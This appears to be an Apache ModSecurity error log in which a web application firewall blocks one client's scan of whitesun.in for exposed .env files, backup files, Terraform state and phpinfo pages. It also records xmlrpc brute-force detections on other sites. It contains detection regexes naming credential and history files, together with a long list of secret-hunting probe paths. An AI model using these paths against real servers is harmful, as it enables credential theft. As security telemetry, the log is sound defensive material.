[Tue May 26 13:39:44.090724 2026] [security2:error] [pid 544395:tid 544592] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeapi/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKcgAAAEM"]
[Tue May 26 13:39:44.107950 2026] [security2:error] [pid 544395:tid 544599] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeweb/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKdQAAAEo"]
[Tue May 26 13:39:44.134365 2026] [security2:error] [pid 536875:tid 537089] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/old/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrpwAAANk"]
[Tue May 26 13:39:44.140199 2026] [security2:error] [pid 536875:tid 537066] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/opt/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrqAAAAMI"]
[Tue May 26 13:39:44.317795 2026] [security2:error] [pid 536875:tid 537090] [client 45.148.10.95:40004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php-info.php"] [unique_id "ahVVSOr_-FTveSGlx1HrswAAANo"]
[Tue May 26 13:39:44.336522 2026] [security2:error] [pid 544395:tid 544625] [client 45.148.10.95:9760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php.php"] [unique_id "ahVVSBmrs7g3RMCdp8XKhQAAAGQ"]
[Tue May 26 13:39:44.340679 2026] [security2:error] [pid 536875:tid 537062] [client 45.148.10.95:39990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php_info.php"] [unique_id "ahVVSOr_-FTveSGlx1HrtwAAAL4"]
[Tue May 26 13:39:44.379648 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.95:39882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/phpinfo.php"] [unique_id "ahVVSBmrs7g3RMCdp8XKiAAAAFs"]
[Tue May 26 13:39:44.391397 2026] [security2:error] [pid 544395:tid 544564] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/portal/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKiQAAACc"]
[Tue May 26 13:39:44.407918 2026] [security2:error] [pid 544395:tid 544650] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/prod/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKjAAAAH0"]
[Tue May 26 13:39:44.434026 2026] [security2:error] [pid 536875:tid 537051] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/product/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvAAAALM"]
[Tue May 26 13:39:44.435375 2026] [security2:error] [pid 536875:tid 537035] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/production/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvQAAAKM"]
[Tue May 26 13:39:44.465925 2026] [security2:error] [pid 536875:tid 537094] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/project/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrvgAAAN4"]
[Tue May 26 13:39:44.481969 2026] [security2:error] [pid 536875:tid 537098] [client 45.148.10.95:39998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public-api/.env"] [unique_id "ahVVSOr_-FTveSGlx1HrwAAAAOI"]
[Tue May 26 13:39:44.486200 2026] [security2:error] [pid 544395:tid 544580] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKjwAAADc"]
[Tue May 26 13:39:44.502658 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/public/phpinfo.php"] [unique_id "ahVVSOr_-FTveSGlx1HrwQAAANc"]
[Tue May 26 13:39:44.526692 2026] [security2:error] [pid 544395:tid 544528] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public_html/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKkAAAAAM"]
[Tue May 26 13:39:44.550171 2026] [security2:error] [pid 544395:tid 544651] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/qa/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKkgAAAH4"]
[Tue May 26 13:39:44.847542 2026] [security2:error] [pid 544395:tid 544535] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/s3/.env.bak"] [unique_id "ahVVSBmrs7g3RMCdp8XKpAAAAAo"]
[Tue May 26 13:39:44.933256 2026] [security2:error] [pid 544395:tid 544541] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/api/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKqQAAABA"]
[Tue May 26 13:39:44.933770 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:40022] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/.env"] [unique_id "ahVVSOr_-FTveSGlx1Hr3wAAAI0"]
[Tue May 26 13:39:44.967970 2026] [security2:error] [pid 544395:tid 544627] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/server/backend/.env"] [unique_id "ahVVSBmrs7g3RMCdp8XKqgAAAGY"]
[Tue May 26 13:39:45.066106 2026] [security2:error] [pid 536875:tid 537008] [client 45.148.10.95:39998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/services/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr5gAAAIg"]
[Tue May 26 13:39:45.070539 2026] [security2:error] [pid 544395:tid 544526] [client 45.148.10.95:39920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/service/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKsAAAAAE"]
[Tue May 26 13:39:45.143422 2026] [security2:error] [pid 544395:tid 544534] [client 45.148.10.95:39864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shared/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKswAAAAk"]
[Tue May 26 13:39:45.145483 2026] [security2:error] [pid 544395:tid 544596] [client 45.148.10.95:39900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/shop/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKtQAAAEc"]
[Tue May 26 13:39:45.212489 2026] [security2:error] [pid 536875:tid 537114] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/src/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr7wAAAPI"]
[Tue May 26 13:39:45.322998 2026] [security2:error] [pid 544395:tid 544632] [client 45.148.10.95:40026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/srv/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKwwAAAGs"]
[Tue May 26 13:39:45.329564 2026] [security2:error] [pid 536875:tid 537053] [client 45.148.10.95:39892] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stage/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr9gAAALU"]
[Tue May 26 13:39:45.338357 2026] [security2:error] [pid 536875:tid 537027] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/staging/.env"] [unique_id "ahVVSer_-FTveSGlx1Hr-AAAAJs"]
[Tue May 26 13:39:45.382475 2026] [security2:error] [pid 544395:tid 544613] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stg/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKyQAAAFg"]
[Tue May 26 13:39:45.449956 2026] [security2:error] [pid 544395:tid 544601] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/stripe/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XKzQAAAEw"]
[Tue May 26 13:39:45.476957 2026] [cgid:error] [pid 536875:tid 537005] [client 45.148.10.95:39892] AH01264: stderr from /home2/whitece9/public_html/sysinfo.cgi: script not found or unable to stat
[Tue May 26 13:39:45.509916 2026] [security2:error] [pid 536875:tid 537007] [client 45.148.10.95:40006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVVSer_-FTveSGlx1HsBAAAAIc"]
[Tue May 26 13:39:45.556370 2026] [security2:error] [pid 544395:tid 544533] [client 45.148.10.95:39910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/test.php"] [unique_id "ahVVSRmrs7g3RMCdp8XK0gAAAAg"]
[Tue May 26 13:39:45.564476 2026] [security2:error] [pid 536875:tid 537071] [client 45.148.10.95:39974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/test/.env"] [unique_id "ahVVSer_-FTveSGlx1HsBwAAAMc"]
[Tue May 26 13:39:45.599678 2026] [security2:error] [pid 544395:tid 544595] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/user/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK1wAAAEY"]
[Tue May 26 13:39:45.616433 2026] [security2:error] [pid 544395:tid 544529] [client 45.148.10.95:40026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v1/.env"] [unique_id "ahVVSRmrs7g3RMCdp8XK2AAAAAQ"]
[Tue May 26 13:39:45.638384 2026] [security2:error] [pid 536875:tid 537100] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v2/.env"] [unique_id "ahVVSer_-FTveSGlx1HsCgAAAOQ"]
[Tue May 26 13:39:45.654757 2026] [security2:error] [pid 536875:tid 537117] [client 45.148.10.95:9716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/v3/.env"] [unique_id "ahVVSer_-FTveSGlx1HsDAAAAPU"]
[Tue May 26 13:39:45.712646 2026] [security2:error] [pid 536875:tid 537099] [client 172.86.76.182:63628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.76.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVSer_-FTveSGlx1Hr_wAAAOM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:45.712856 2026] [security2:error] [pid 536875:tid 537099] [client 172.86.76.182:63628] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVVSer_-FTveSGlx1Hr_wAAAOM"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 13:39:45.785527 2026] [security2:error] [pid 544395:tid 544567] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVSRmrs7g3RMCdp8XKxwAAACo"]
